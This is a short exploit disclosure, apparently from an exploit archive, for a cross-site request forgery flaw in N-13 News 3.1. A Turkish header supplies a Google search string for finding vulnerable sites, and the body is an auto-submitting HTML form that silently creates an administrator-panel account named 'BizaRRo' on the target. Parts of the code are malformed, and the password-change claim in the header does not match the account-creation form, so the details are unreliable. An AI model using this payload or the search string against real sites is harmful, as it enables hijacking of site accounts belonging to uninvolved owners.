< ------------------- header data start ------------------- >

#############################################################

# Application Name : N-13 News 3.1

# Vulnerable Type : Cross Site Request Forgery

# Google Keyword : Powered by N-13 News

# Infection : Yönetici ve user sifreleri uzaktan degisilebilir.

# Bug Fix Advice : Form’a Oturum Key’i (Session Token) eklenmeli, eski sifre sorulmalidir.

# author : Bug Researchers

#############################################################

< ------------------- header data end of ------------------- >



< -- bug code start -- >

<b0dy onLoad=Submit();>
<script>function Submit[]{document.BizaRRo.submit();}</script>

<Form Action=http://Site.com/[PATCH]/admin.php?action=options&mod=accounts&create=new method=post >
<input type=hidden name=Tname size=24 value=BizaRRo>
<input type=hidden name=T1 size=24 value=[email protected]>
<input type=hidden name=T2 size=24 value=BizaRRo>
<input type=hidden name=T3 size=24 value=BizaRRo>
<select size=1 name=D1>
<option value=1>
<input type=submit value=create name=B1>

< -- bug code end of -- >